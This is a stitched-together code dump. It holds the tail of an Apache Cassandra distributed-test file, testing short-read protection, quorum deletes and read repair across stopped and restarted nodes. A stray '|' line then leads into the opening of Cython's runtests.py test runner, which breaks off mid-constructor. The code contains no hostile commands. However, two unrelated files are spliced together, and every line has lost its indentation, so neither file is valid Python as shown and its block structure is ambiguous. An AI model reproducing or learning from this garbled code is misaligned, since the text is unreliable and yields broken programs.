for id in range(0, 10):
session.execute(stmt, [id], ConsistencyLevel.ALL)
# delete every other partition on node1 while node2 is down
node2.stop(wait_other_notice=True)
session.execute('DELETE FROM test.test WHERE id IN (5, 8, 2, 7, 9);')
node2.start(wait_other_notice=True, wait_for_binary_proto=True)
session = self.patient_cql_connection(node2)
# delete every other alternate partition on node2 while node1 is down
node1.stop(wait_other_notice=True)
session.execute('DELETE FROM test.test WHERE id IN (1, 0, 4, 6);')
node1.start(wait_other_notice=True, wait_for_binary_proto=True)
session = self.patient_exclusive_cql_connection(node1)
# until #13595 the query would incorrectly return [1]
assert_all(session,
'SELECT id FROM test.test LIMIT 1;',
[[3]],
cl=ConsistencyLevel.ALL)
srp = make_mbean('metrics', type='Table', name='ShortReadProtectionRequests', keyspace='test', scope='test')
with JolokiaAgent(node1) as jmx:
# 4 srp requests for node1 and 5 for node2, total of 9
assert 9 == jmx.read_attribute(srp, 'Count')
@since('3.0')
def test_12872(self):
"""
@jira_ticket CASSANDRA-12872
"""
cluster = self.cluster
# disable hinted handoff and set batch commit log so this doesn't interfere with the test
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
cluster.populate(2).start(wait_other_notice=True)
node1, node2 = cluster.nodelist()
session = self.patient_cql_connection(node1)
query = "CREATE KEYSPACE IF NOT EXISTS test WITH replication = {'class': 'NetworkTopologyStrategy', 'datacenter1': 2};"
session.execute(query)
query = "CREATE TABLE test.test (pk int, ck int, PRIMARY KEY (pk, ck));"
session.execute(query)
stmt = session.prepare("INSERT INTO test.test (pk, ck) VALUES (0, ?);")
for ck in range(0, 4):
session.execute(stmt, [ck], ConsistencyLevel.ALL)
# node1 | up | 0 1 2 3
# node2 | up | 0 1 2 3
node2.stop(wait_other_notice=True)
# node1 | up | 0 1 2 3
# node2 | down | 0 1 2 3
session.execute('DELETE FROM test.test WHERE pk = 0 AND ck IN (1, 2, 3);')
# node1 | up | 0 x x x
# node2 | down | 0 1 2 3
session.execute('INSERT INTO test.test (pk, ck) VALUES (0, 5);')
# node1 | up | 0 x x x 5
# node2 | down | 0 1 2 3
node2.start(wait_other_notice=True)
node1.stop(wait_other_notice=True)
# node1 | down | 0 x x x 5
# node2 | up | 0 1 2 3
session = self.patient_cql_connection(node2)
session.execute('INSERT INTO test.test (pk, ck) VALUES (0, 4);')
# node1 | down | 0 x x x 5
# node2 | up | 0 1 2 3 4
node1.start(wait_other_notice=True)
# node1 | up | 0 x x x 5
# node2 | up | 0 1 2 3 4
assert_all(session,
'SELECT ck FROM test.test WHERE pk = 0 LIMIT 2;',
[[0], [4]],
cl=ConsistencyLevel.ALL)
def test_short_read(self):
"""
@jira_ticket CASSANDRA-9460
"""
cluster = self.cluster
# This test causes the python driver to be extremely noisy due to
# frequent starting and stopping of nodes. Let's move the log level
# of the driver to ERROR for this test only
logging.getLogger("cassandra").setLevel('ERROR')
# Disable hinted handoff and set batch commit log so this doesn't
# interfer with the test
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
cluster.populate(3).start(wait_other_notice=True)
node1, node2, node3 = cluster.nodelist()
session = self.patient_cql_connection(node1)
create_ks(session, 'ks', 3)
if cluster.version() < '4.0':
create_cf(session, 'cf', read_repair=0.0)
else:
create_cf(session, 'cf')
normal_key = 'normal'
reversed_key = 'reversed'
# insert 9 columns in two rows
insert_columns(self, session, normal_key, 9)
insert_columns(self, session, reversed_key, 9)
# Delete 3 first columns (and 3 last columns, for the reversed version) with a different node dead each time
for node, column_number_to_delete in zip(list(range(1, 4)), list(range(3))):
self.stop_node(node)
self.delete(node, normal_key, column_number_to_delete)
self.delete(node, reversed_key, 8 - column_number_to_delete)
self.restart_node(node)
# Query 3 firsts columns in normal order
session = self.patient_cql_connection(node1, 'ks')
query = SimpleStatement(
'SELECT c, v FROM cf WHERE key=\'k{}\' LIMIT 3'.format(normal_key),
consistency_level=ConsistencyLevel.QUORUM)
rows = list(session.execute(query))
res = rows
assert_length_equal(res, 3)
# value 0, 1 and 2 have been deleted
for i in range(1, 4):
assert 'value{}'.format(i + 2) == res[i - 1][1]
# Query 3 firsts columns in reverse order
session = self.patient_cql_connection(node1, 'ks')
query = SimpleStatement(
'SELECT c, v FROM cf WHERE key=\'k{}\' ORDER BY c DESC LIMIT 3'.format(reversed_key),
consistency_level=ConsistencyLevel.QUORUM)
rows = list(session.execute(query))
res = rows
assert_length_equal(res, 3)
# value 6, 7 and 8 have been deleted
for i in range(0, 3):
assert 'value{}'.format(5 - i) == res[i][1]
session.execute('TRUNCATE cf')
def test_short_read_delete(self):
""" Test short reads ultimately leaving no columns alive [#4000] """
cluster = self.cluster
# Disable hinted handoff and set batch commit log so this doesn't
# interfere with the test
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
cluster.populate(2).start(wait_other_notice=True)
node1, node2 = cluster.nodelist()
session = self.patient_cql_connection(node1)
create_ks(session, 'ks', 3)
if cluster.version() < '4.0':
create_cf(session, 'cf', read_repair=0.0)
else:
create_cf(session, 'cf')
# insert 2 columns in one row
insert_columns(self, session, 0, 2)
# Delete the row while first node is dead
node1.flush()
node1.stop(wait_other_notice=True)
session = self.patient_cql_connection(node2, 'ks')
query = SimpleStatement('DELETE FROM cf WHERE key=\'k0\'', consistency_level=ConsistencyLevel.ONE)
session.execute(query)
node1.start(wait_other_notice=True)
# Query first column
session = self.patient_cql_connection(node1, 'ks')
assert_none(session, "SELECT c, v FROM cf WHERE key=\'k0\' LIMIT 1", cl=ConsistencyLevel.QUORUM)
def test_short_read_quorum_delete(self):
"""
@jira_ticket CASSANDRA-8933
"""
cluster = self.cluster
# Consider however 3 nodes A, B, C (RF=3), and following sequence of operations (all done at QUORUM):
# Disable hinted handoff and set batch commit log so this doesn't
# interfere with the test
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
cluster.populate(3).start(wait_other_notice=True)
node1, node2, node3 = cluster.nodelist()
session = self.patient_cql_connection(node1)
create_ks(session, 'ks', 3)
if cluster.version() < '4.0':
session.execute("CREATE TABLE t (id int, v int, PRIMARY KEY(id, v)) WITH read_repair_chance = 0.0")
else:
session.execute("CREATE TABLE t (id int, v int, PRIMARY KEY(id, v))")
# we write 1 and 2 in a partition: all nodes get it.
session.execute(SimpleStatement("INSERT INTO t (id, v) VALUES (0, 1)", consistency_level=ConsistencyLevel.ALL))
session.execute(SimpleStatement("INSERT INTO t (id, v) VALUES (0, 2)", consistency_level=ConsistencyLevel.ALL))
# we delete 1: only A and C get it.
node2.flush()
node2.stop(wait_other_notice=True)
session.execute(SimpleStatement("DELETE FROM t WHERE id = 0 AND v = 1", consistency_level=ConsistencyLevel.QUORUM))
node2.start(wait_other_notice=True)
# we delete 2: only B and C get it.
node1.flush()
node1.stop(wait_other_notice=True)
session = self.patient_cql_connection(node2, 'ks')
session.execute(SimpleStatement("DELETE FROM t WHERE id = 0 AND v = 2", consistency_level=ConsistencyLevel.QUORUM))
node1.start(wait_other_notice=True)
session = self.patient_cql_connection(node1, 'ks')
# we read the first row in the partition (so with a LIMIT 1) and A and B answer first.
node3.flush()
node3.stop(wait_other_notice=True)
assert_none(session, "SELECT * FROM t WHERE id = 0 LIMIT 1", cl=ConsistencyLevel.QUORUM)
def test_readrepair(self):
cluster = self.cluster
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
if not self.dtest_config.use_vnodes:
cluster.populate(2).start()
else:
tokens = cluster.balanced_tokens(2)
cluster.populate(2, tokens=tokens).start()
node1, node2 = cluster.nodelist()
session = self.patient_cql_connection(node1)
create_ks(session, 'ks', 2)
if cluster.version() < '4.0':
create_c1c2_table(self, session, read_repair=1.0)
else:
create_c1c2_table(self, session)
node2.stop(wait_other_notice=True)
insert_c1c2(session, n=10000, consistency=ConsistencyLevel.ONE)
node2.start(wait_for_binary_proto=True, wait_other_notice=True)
# query everything to cause RR
for n in range(0, 10000):
query_c1c2(session, n, ConsistencyLevel.QUORUM)
node1.stop(wait_other_notice=True)
# Check node2 for all the keys that should have been repaired
session = self.patient_cql_connection(node2, keyspace='ks')
for n in range(0, 10000):
query_c1c2(session, n, ConsistencyLevel.ONE)
def test_quorum_available_during_failure(self):
cl = ConsistencyLevel.QUORUM
rf = 3
logger.debug("Creating a ring")
cluster = self.cluster
if not self.dtest_config.use_vnodes:
cluster.populate(3).start()
else:
tokens = cluster.balanced_tokens(3)
cluster.populate(3, tokens=tokens).start()
node1, node2, node3 = cluster.nodelist()
logger.debug("Set to talk to node 2")
session = self.patient_cql_connection(node2)
create_ks(session, 'ks', rf)
create_c1c2_table(self, session)
logger.debug("Generating some data")
insert_c1c2(session, n=100, consistency=cl)
logger.debug("Taking down node1")
node1.stop(wait_other_notice=True)
logger.debug("Reading back data.")
for n in range(100):
query_c1c2(session, n, cl)
def stop_node(self, node_number):
to_stop = self.cluster.nodes["node%d" % node_number]
to_stop.flush()
to_stop.stop(wait_other_notice=True)
def delete(self, stopped_node_number, key, column):
next_node = self.cluster.nodes["node%d" % (((stopped_node_number + 1) % 3) + 1)]
session = self.patient_cql_connection(next_node, 'ks')
# delete data for normal key
query = 'BEGIN BATCH '
query = query + 'DELETE FROM cf WHERE key=\'k%s\' AND c=\'c%06d\'; ' % (key, column)
query = query + 'DELETE FROM cf WHERE key=\'k%s\' AND c=\'c2\'; ' % (key,)
query = query + 'APPLY BATCH;'
simple_query = SimpleStatement(query, consistency_level=ConsistencyLevel.QUORUM)
session.execute(simple_query)
def restart_node(self, node_number):
stopped_node = self.cluster.nodes["node%d" % node_number]
stopped_node.start(wait_for_binary_proto=True, wait_other_notice=True)
|
runtests.py | #!/usr/bin/env python
from __future__ import print_function
import atexit
import os
import sys
import re
import gc
import heapq
import locale
import shutil
import time
import unittest
import doctest
import operator
import subprocess
import tempfile
import traceback
import warnings
import zlib
import glob
from contextlib import contextmanager
try:
import platform
IS_PYPY = platform.python_implementation() == 'PyPy'
IS_CPYTHON = platform.python_implementation() == 'CPython'
except (ImportError, AttributeError):
IS_CPYTHON = True
IS_PYPY = False
IS_PY2 = sys.version_info[0] < 3
from io import open as io_open
try:
from StringIO import StringIO
except ImportError:
from io import StringIO # doesn't accept 'str' in Py2
try:
import cPickle as pickle
except ImportError:
import pickle
try:
import threading
except ImportError: # No threads, no problems
threading = None
try:
from collections import defaultdict
except ImportError:
class defaultdict(object):
def __init__(self, default_factory=lambda : None):
self._dict = {}
self.default_factory = default_factory
def __getitem__(self, key):
if key not in self._dict:
self._dict[key] = self.default_factory()
return self._dict[key]
def __setitem__(self, key, value):
self._dict[key] = value
def __contains__(self, key):
return key in self._dict
def __repr__(self):
return repr(self._dict)
def __nonzero__(self):
return bool(self._dict)
try:
from unittest import SkipTest
except ImportError:
class SkipTest(Exception): # don't raise, only provided to allow except-ing it!
pass
def skip_test(reason):
sys.stderr.write("Skipping test: %s\n" % reason)
else:
def skip_test(reason):
raise SkipTest(reason)
try:
basestring
except NameError:
basestring = str
WITH_CYTHON = True
CY3_DIR = None
from distutils.command.build_ext import build_ext as _build_ext
from distutils import sysconfig
from distutils import ccompiler
_to_clean = []
@atexit.register
def _cleanup_files():
"""
This is only used on Cygwin to clean up shared libraries that are unsafe
to delete while the test suite is running.
"""
for filename in _to_clean:
if os.path.isdir(filename):
shutil.rmtree(filename, ignore_errors=True)
else:
try:
os.remove(filename)
except OSError:
pass
def get_distutils_distro(_cache=[]):
if _cache:
return _cache[0]
# late import to accommodate for setuptools override
from distutils.dist import Distribution
distutils_distro = Distribution()
if sys.platform == 'win32':
# TODO: Figure out why this hackery (see https://thread.gmane.org/gmane.comp.python.cython.devel/8280/).
config_files = distutils_distro.find_config_files()
try:
config_files.remove('setup.cfg')
except ValueError:
pass
distutils_distro.parse_config_files(config_files)
cfgfiles = distutils_distro.find_config_files()
try:
cfgfiles.remove('setup.cfg')
except ValueError:
pass
distutils_distro.parse_config_files(cfgfiles)
_cache.append(distutils_distro)
return distutils_distro
EXT_DEP_MODULES = {
'tag:numpy': 'numpy',
'tag:numpy_old': 'numpy',
'tag:pythran': 'pythran',
'tag:setuptools': 'setuptools.sandbox',
'tag:asyncio': 'asyncio',
'tag:pstats': 'pstats',
'tag:posix': 'posix',
'tag:array': 'array',
'tag:coverage': 'Cython.Coverage',
'Coverage': 'Cython.Coverage',
'tag:ipython': 'IPython.testing.globalipapp',
'tag:jedi': 'jedi_BROKEN_AND_DISABLED',
'tag:test.support': 'test.support', # support module for CPython unit tests
}
def patch_inspect_isfunction():
import inspect
orig_isfunction = inspect.isfunction
def isfunction(obj):
return orig_isfunction(obj) or type(obj).__name__ == 'cython_function_or_method'
isfunction._orig_isfunction = orig_isfunction
inspect.isfunction = isfunction
def unpatch_inspect_isfunction():
import inspect
try:
orig_isfunction = inspect.isfunction._orig_isfunction
except AttributeError:
pass
else:
inspect.isfunction = orig_isfunction
def def_to_cdef(source):
'''
Converts the module-level def methods into cdef methods, i.e.
@decorator
def foo([args]):
"""
[tests]
"""
[body]
becomes
def foo([args]):
"""
[tests]
"""
return foo_c([args])
cdef foo_c([args]):
[body]
'''
output = []
skip = False
def_node = re.compile(r'def (\w+)\(([^()*]*)\):').match
lines = iter(source.split('\n'))
for line in lines:
if not line.strip():
output.append(line)
continue
if skip:
if line[0] != ' ':
skip = False
else:
continue
if line[0] == '@':
skip = True
continue
m = def_node(line)
if m:
name = m.group(1)
args = m.group(2)
if args:
args_no_types = ", ".join(arg.split()[-1] for arg in args.split(','))
else:
args_no_types = ""
output.append("def %s(%s):" % (name, args_no_types))
line = next(lines)
if '"""' in line:
has_docstring = True
output.append(line)
for line in lines:
output.append(line)
if '"""' in line:
break
else:
has_docstring = False
output.append(" return %s_c(%s)" % (name, args_no_types))
output.append('')
output.append("cdef %s_c(%s):" % (name, args))
if not has_docstring:
output.append(line)
else:
output.append(line)
return '\n'.join(output)
def exclude_extension_in_pyver(*versions):
def check(ext):
return EXCLUDE_EXT if sys.version_info[:2] in versions else ext
return check
def exclude_extension_on_platform(*platforms):
def check(ext):
return EXCLUDE_EXT if sys.platform in platforms else ext
return check
def update_linetrace_extension(ext):
ext.define_macros.append(('CYTHON_TRACE', 1))
return ext
def update_old_numpy_extension(ext):
update_numpy_extension(ext, set_api17_macro=False)
def update_numpy_extension(ext, set_api17_macro=True):
import numpy
from numpy.distutils.misc_util import get_info
ext.include_dirs.append(numpy.get_include())
if set_api17_macro:
ext.define_macros.append(('NPY_NO_DEPRECATED_API', 'NPY_1_7_API_VERSION'))
# We need the npymath library for numpy.math.
# This is typically a static-only library.
for attr, value in get_info('npymath').items():
getattr(ext, attr).extend(value)
def update_openmp_extension(ext):
ext.openmp = True
language = ext.language
if sys.platform == 'win32' and sys.version_info[:2] == (3,4):
# OpenMP tests fail in appveyor in Py3.4 -> just ignore them, EoL of Py3.4 is early 2019...
return EXCLUDE_EXT
if language == 'cpp':
flags = OPENMP_CPP_COMPILER_FLAGS
else:
flags = OPENMP_C_COMPILER_FLAGS
if flags:
compile_flags, link_flags = flags
ext.extra_compile_args.extend(compile_flags.split())
ext.extra_link_args.extend(link_flags.split())
return ext
elif sys.platform == 'win32':
return ext
return EXCLUDE_EXT
def update_cpp11_extension(ext):
"""
update cpp11 extensions that will run on versions of gcc >4.8
"""
gcc_version = get_gcc_version(ext.language)
if gcc_version:
compiler_version = gcc_version.group(1)
if float(compiler_version) > 4.8:
ext.extra_compile_args.append("-std=c++11")
return ext
clang_version = get_clang_version(ext.language)
if clang_version:
ext.extra_compile_args.append("-std=c++11")
if sys.platform == "darwin":
ext.extra_compile_args.append("-stdlib=libc++")
ext.extra_compile_args.append("-mmacosx-version-min=10.7")
return ext
return EXCLUDE_EXT
def get_cc_version(language):
"""
finds gcc version using Popen
"""
if language == 'cpp':
cc = sysconfig.get_config_var('CXX')
else:
cc = sysconfig.get_config_var('CC')
if not cc:
cc = ccompiler.get_default_compiler()
if not cc:
return ''
# For some reason, cc can be e.g. 'gcc -pthread'
cc = cc.split()[0]
# Force english output
env = os.environ.copy()
env['LC_MESSAGES'] = 'C'
try:
p = subprocess.Popen([cc, "-v"], stderr=subprocess.PIPE, env=env)
except EnvironmentError:
# Be compatible with Python 3
warnings.warn("Unable to find the %s compiler: %s: %s" %
(language, os.strerror(sys.exc_info()[1].errno), cc))
return ''
_, output = p.communicate()
return output.decode(locale.getpreferredencoding() or 'ASCII', 'replace')
def get_gcc_version(language):
matcher = re.compile(r"gcc version (\d+\.\d+)").search
return matcher(get_cc_version(language))
def get_clang_version(language):
matcher = re.compile(r"clang(?:-|\s+version\s+)(\d+\.\d+)").search
return matcher(get_cc_version(language))
def get_openmp_compiler_flags(language):
"""
As of gcc 4.2, it supports OpenMP 2.5. Gcc 4.4 implements 3.0. We don't
(currently) check for other compilers.
returns a two-tuple of (CFLAGS, LDFLAGS) to build the OpenMP extension
"""
gcc_version = get_gcc_version(language)
if not gcc_version:
if sys.platform == 'win32':
return '/openmp', ''
else:
return None # not gcc - FIXME: do something about other compilers
# gcc defines "__int128_t", assume that at least all 64 bit architectures have it
global COMPILER_HAS_INT128
COMPILER_HAS_INT128 = getattr(sys, 'maxsize', getattr(sys, 'maxint', 0)) > 2**60
compiler_version = gcc_version.group(1)
if compiler_version and compiler_version.split('.') >= ['4', '2']:
return '-fopenmp', '-fopenmp'
try:
locale.setlocale(locale.LC_ALL, '')
except locale.Error:
pass
COMPILER = None
COMPILER_HAS_INT128 = False
OPENMP_C_COMPILER_FLAGS = get_openmp_compiler_flags('c')
OPENMP_CPP_COMPILER_FLAGS = get_openmp_compiler_flags('cpp')
# Return this from the EXT_EXTRAS matcher callback to exclude the extension
EXCLUDE_EXT = object()
EXT_EXTRAS = {
'tag:numpy' : update_numpy_extension,
'tag:numpy_old' : update_old_numpy_extension,
'tag:openmp': update_openmp_extension,
'tag:cpp11': update_cpp11_extension,
'tag:trace' : update_linetrace_extension,
'tag:bytesformat': exclude_extension_in_pyver((3, 3), (3, 4)), # no %-bytes formatting
'tag:no-macos': exclude_extension_on_platform('darwin'),
}
# TODO: use tags
VER_DEP_MODULES = {
# tests are excluded if 'CurrentPythonVersion OP VersionTuple', i.e.
# (2,4) : (operator.lt, ...) excludes ... when PyVer < 2.4.x
# The next line should start (3,); but this is a dictionary, so
# we can only have one (3,) key. Since 2.7 is supposed to be the
# last 2.x release, things would have to change drastically for this
# to be unsafe...
(2,999): (operator.lt, lambda x: x in ['run.special_methods_T561_py3',
'run.test_raisefrom',
'run.different_package_names',
]),
(3,): (operator.ge, lambda x: x in ['run.non_future_division',
'compile.extsetslice',
'compile.extdelslice',
'run.special_methods_T561_py2',
]),
(3,3) : (operator.lt, lambda x: x in ['build.package_compilation',
'build.cythonize_pep420_namespace',
'run.yield_from_py33',
'pyximport.pyximport_namespace',
'run.qualname',
]),
(3,4): (operator.lt, lambda x: x in ['run.py34_signature',
'run.test_unicode', # taken from Py3.7, difficult to backport
]),
(3,4,999): (operator.gt, lambda x: x in ['run.initial_file_path',
]),
(3,5): (operator.lt, lambda x: x in ['run.py35_pep492_interop',
'run.py35_asyncio_async_def',
'run.mod__spec__',
'run.pep526_variable_annotations', # typing module
'run.test_exceptions', # copied from Py3.7+
]),
}
INCLUDE_DIRS = [ d for d in os.getenv('INCLUDE', '').split(os.pathsep) if d ]
CFLAGS = os.getenv('CFLAGS', '').split()
CCACHE = os.getenv('CYTHON_RUNTESTS_CCACHE', '').split()
TEST_SUPPORT_DIR = 'testsupport'
BACKENDS = ['c', 'cpp']
UTF8_BOM_BYTES = r'\xef\xbb\xbf'.encode('ISO-8859-1').decode('unicode_escape')
def memoize(f):
uncomputed = object()
f._cache = {}
def func(*args):
res = f._cache.get(args, uncomputed)
if res is uncomputed:
res = f._cache[args] = f(*args)
return res
return func
@memoize
def parse_tags(filepath):
tags = defaultdict(list)
parse_tag = re.compile(r'#\s*(\w+)\s*:(.*)$').match
with io_open(filepath, encoding='ISO-8859-1', errors='ignore') as f:
for line in f:
# ignore BOM-like bytes and whitespace
line = line.lstrip(UTF8_BOM_BYTES).strip()
if not line:
if tags:
break # assume all tags are in one block
else:
continue
if line[0] != '#':
break
parsed = parse_tag(line)
if parsed:
tag, values = parsed.groups()
if tag in ('coding', 'encoding'):
continue
if tag == 'tags':
tag = 'tag'
print("WARNING: test tags use the 'tag' directive, not 'tags' (%s)" % filepath)
if tag not in ('mode', 'tag', 'ticket', 'cython', 'distutils', 'preparse'):
print("WARNING: unknown test directive '%s' found (%s)" % (tag, filepath))
values = values.split(',')
tags[tag].extend(filter(None, [value.strip() for value in values]))
elif tags:
break # assume all tags are in one block
return tags
list_unchanging_dir = memoize(lambda x: os.listdir(x))
@memoize
def _list_pyregr_data_files(test_directory):
is_data_file = re.compile('(?:[.](txt|pem|db|html)|^bad.*[.]py)$').search
return ['__init__.py'] + [
filename for filename in list_unchanging_dir(test_directory)
if is_data_file(filename)]
def import_ext(module_name, file_path=None):
if file_path:
import imp
return imp.load_dynamic(module_name, file_path)
else:
try:
from importlib import invalidate_caches
except ImportError:
pass
else:
invalidate_caches()
return __import__(module_name, globals(), locals(), ['*'])
class build_ext(_build_ext):
def build_extension(self, ext):
try:
try: # Py2.7+ & Py3.2+
compiler_obj = self.compiler_obj
except AttributeError:
compiler_obj = self.compiler
if ext.language == 'c++':
compiler_obj.compiler_so.remove('-Wstrict-prototypes')
if CCACHE:
compiler_obj.compiler_so = CCACHE + compiler_obj.compiler_so
if getattr(ext, 'openmp', None) and compiler_obj.compiler_type == 'msvc':
ext.extra_compile_args.append('/openmp')
except Exception:
pass
_build_ext.build_extension(self, ext)
class ErrorWriter(object):
match_error = re.compile(r'(warning:)?(?:.*:)?\s*([-0-9]+)\s*:\s*([-0-9]+)\s*:\s*(.*)').match
def __init__(self, encoding=None):
self.output = []
self.encoding = encoding
def write(self, value):
if self.encoding:
value = value.encode('ISO-8859-1').decode(self.encoding)
self.output.append(value)
def _collect(self):
s = ''.join(self.output)
results = {'errors': [], 'warnings': []}
for line in s.splitlines():
match = self.match_error(line)
if match:
is_warning, line, column, message = match.groups()
results['warnings' if is_warning else 'errors'].append((int(line), int(column), message.strip()))
return [["%d:%d: %s" % values for values in sorted(results[key])] for key in ('errors', 'warnings')]
def geterrors(self):
return self._collect()[0]
def getwarnings(self):
return self._collect()[1]
def getall(self):
return self._collect()
def close(self):
pass # ignore, only to match file-like interface
class Stats(object):
def __init__(self, top_n=8):
self.top_n = top_n
self.test_counts = defaultdict(int)
self.test_times = defaultdict(float)
self.top_tests = defaultdict(list)
def add_time(self, name, language, metric, t):
self.test_counts[metric] += 1
self.test_times[metric] += t
top = self.top_tests[metric]
push = heapq.heappushpop if len(top) >= self.top_n else heapq.heappush
# min-heap => pop smallest/shortest until longest times remain
push(top, (t, name, language))
@contextmanager
def time(self, name, language, metric):
t = time.time()
yield
t = time.time() - t
self.add_time(name, language, metric, t)
def update(self, stats):
# type: (Stats) -> None
for metric, t in stats.test_times.items():
self.test_times[metric] += t
self.test_counts[metric] += stats.test_counts[metric]
top = self.top_tests[metric]
for entry in stats.top_tests[metric]:
push = heapq.heappushpop if len(top) >= self.top_n else heapq.heappush
push(top, entry)
def print_stats(self, out=sys.stderr):
if not self.test_times:
return
lines = ['Times:\n']
for metric, t in sorted(self.test_times.items()):
count = self.test_counts[metric]
top = self.top_tests[metric]
lines.append("%-12s: %8.2f sec (%4d, %6.3f / run) - slowest: %s\n" % (
metric, t, count, t / count,
', '.join("'{2}:{1}' ({0:.2f}s)".format(*item) for item in heapq.nlargest(self.top_n, top))))
out.write(''.join(lines))
class TestBuilder(object):
def __init__(self, rootdir, workdir, selectors, exclude_selectors, options,
with_pyregr, languages, test_bugs, language_level,
common_utility_dir, pythran_dir=None,
default_mode='run', stats=None,
add_embedded_test=False):
self.rootdir = rootdir
self.workdir = workdir
self.selectors = selectors
self.exclude_selectors = exclude_selectors
self.annotate = options.annotate_source
self.cleanup_workdir = options.cleanup_workdir
self.cleanup_sharedlibs = options.cleanup_sharedlibs
self.cleanup_failures = options.cleanup_failures
self.with_pyregr = with_pyregr
self.cython_only = options.cython_only
self.languages = languages
self.test_bugs = test_bugs
self.fork = options.fork
self.language_level = language_level
self.test_determinism = options.test_determinism
self.common_utility_dir = common_utility_dir
self.pythran_dir = pythran_dir
self.default_mode = default_mode
self.stats = stats
self.add_embedded_test = add_embedded_test
self.capture = options.capture
def build_suite(self):
suite = unittest.TestSuite()
filenames = os.listdir(self.rootdir)
filenames.sort()
for filename in filenames:
path = os.path.join(self.rootdir, filename)
if os.path.isdir(path) and filename != TEST_SUPPORT_DIR:
if filename == 'pyregr' and not self.with_pyregr:
continue
if filename == 'broken' and not self.test_bugs:
continue
suite.addTest(
self.handle_directory(path, filename))
if sys.platform not in ['win32'] and self.add_embedded_test:
# Non-Windows makefile.
if [1 for selector in self.selectors if selector("embedded")] \
and not [1 for selector in self.exclude_selectors if selector("embedded")]:
suite.addTest(unittest.makeSuite(EmbedTest))
return suite
def handle_directory(self, path, context):
workdir = os.path.join(self.workdir, context)
if not os.path.exists(workdir):
os.makedirs(workdir)
suite = unittest.TestSuite()
filenames = list_unchanging_dir(path)
filenames.sort()
for filename in filenames:
filepath = os.path.join(path, filename)
module, ext = os.path.splitext(filename)
if ext not in ('.py', '.pyx', '.srctree'):
continue
if filename.startswith('.'):
continue # certain emacs backup files
if context == 'pyregr':
tags = defaultdict(list)
else:
tags = parse_tags(filepath)
fqmodule = "%s.%s" % (context, module)
if not [ 1 for match in self.selectors
if match(fqmodule, tags) ]:
continue
if self.exclude_selectors:
if [1 for match in self.exclude_selectors
if match(fqmodule, tags)]:
continue
mode = self.default_mode
if tags['mode']:
mode = tags['mode'][0]
elif context == 'pyregr':
mode = 'pyregr'
if ext == '.srctree':
if 'cpp' not in tags['tag'] or 'cpp' in self.languages:
suite.addTest(EndToEndTest(filepath, workdir,
self.cleanup_workdir, stats=self.stats,
capture=self.capture))
continue
# Choose the test suite.
if mode == 'pyregr':
if not filename.startswith('test_'):
continue
test_class = CythonPyregrTestCase
elif mode == 'run':
if module.startswith("test_"):
test_class = CythonUnitTestCase
else:
test_class = CythonRunTestCase
elif mode in ['compile', 'error']:
test_class = CythonCompileTestCase
else:
raise KeyError('Invalid test mode: ' + mode)
for test in self.build_tests(test_class, path, workdir,
module, mode == 'error', tags):
suite.addTest(test)
if mode == 'run' and ext == '.py' and not self.cython_only and not filename.startswith('test_'):
# additionally test file in real Python
min_py_ver = [
(int(pyver.group(1)), int(pyver.group(2)))
for pyver in map(re.compile(r'pure([0-9]+)[.]([0-9]+)').match, tags['tag'])
if pyver
]
if not min_py_ver or any(sys.version_info >= min_ver for min_ver in min_py_ver):
suite.addTest(PureDoctestTestCase(module, os.path.join(path, filename), tags, stats=self.stats))
return suite
def build_tests(self, test_class, path, workdir, module, expect_errors, tags):
warning_errors = 'werror' in tags['tag']
expect_warnings = 'warnings' in tags['tag']
if expect_errors:
if skip_c(tags) and 'cpp' in self.languages:
languages = ['cpp']
else:
languages = self.languages[:1]
else:
languages = self.languages
if skip_c(tags) and 'c' in languages:
languages = list(languages)
languages.remove('c')
elif 'no-cpp' in tags['tag'] and 'cpp' in self.languages:
languages = list(languages)
languages.remove('cpp')
language_levels = [2, 3] if 'all_language_levels' in tags['tag'] else [None]
pythran_dir = self.pythran_dir
if 'pythran' in tags['tag'] and not pythran_dir and 'cpp' in languages:
import pythran.config
try:
pythran_ext = pythran.config.make_extension(python=True)
except TypeError: # old pythran version syntax
pythran_ext = pythran.config.make_extension()
pythran_dir = pythran_ext['include_dirs'][0]
preparse_list = tags.get('preparse', ['id'])
tests = [ self.build_test(test_class, path, workdir, module, tags, language, language_level,
expect_errors, expect_warnings, warning_errors, preparse,
pythran_dir if language == "cpp" else None)
for language in languages
for preparse in preparse_list
for language_level in language_levels
]
return tests
def build_test(self, test_class, path, workdir, module, tags, language, language_level,
expect_errors, expect_warnings, warning_errors, preparse, pythran_dir):
language_workdir = os.path.join(workdir, language)
if not os.path.exists(language_workdir):
os.makedirs(language_workdir)
workdir = os.path.join(language_workdir, module)
if preparse != 'id':
workdir += '_%s' % (preparse,)
if language_level:
workdir += '_cy%d' % (language_level,)
return test_class(path, workdir, module, tags,
language=language,
preparse=preparse,
expect_errors=expect_errors,
expect_warnings=expect_warnings,
annotate=self.annotate,
cleanup_workdir=self.cleanup_workdir,
cleanup_sharedlibs=self.cleanup_sharedlibs,
cleanup_failures=self.cleanup_failures,
cython_only=self.cython_only,
fork=self.fork,
language_level=language_level or self.language_level,
warning_errors=warning_errors,
test_determinism=self.test_determinism,
common_utility_dir=self.common_utility_dir,
pythran_dir=pythran_dir,
stats=self.stats)
def skip_c(tags):
if 'cpp' in tags['tag']:
return True
# We don't want to create a distutils key in the
# dictionary so we check before looping.
if 'distutils' in tags:
for option in tags['distutils']:
splitted = option.split('=')
if len(splitted) == 2:
argument, value = splitted
if argument.strip() == 'language' and value.strip() == 'c++':
return True
return False
def filter_stderr(stderr_bytes):
"""
Filter annoying warnings from output.
"""
if b"Command line warning D9025" in stderr_bytes:
# MSCV: cl : Command line warning D9025 : overriding '/Ox' with '/Od'
stderr_bytes = b'\n'.join(
line for line in stderr_bytes.splitlines()
if b"Command line warning D9025" not in line)
return stderr_bytes
class CythonCompileTestCase(unittest.TestCase):
def __init__(self, test_directory, workdir, module, tags, language='c', preparse='id',
expect_errors=False, expect_warnings=False, annotate=False, cleanup_workdir=True,
cleanup_sharedlibs=True, cleanup_failures=True, cython_only=False,
fork=True, language_level=2, warning_errors=False,
test_determinism=False,
common_utility_dir=None, pythran_dir=None, stats=None):
self.test_directory = test_directory
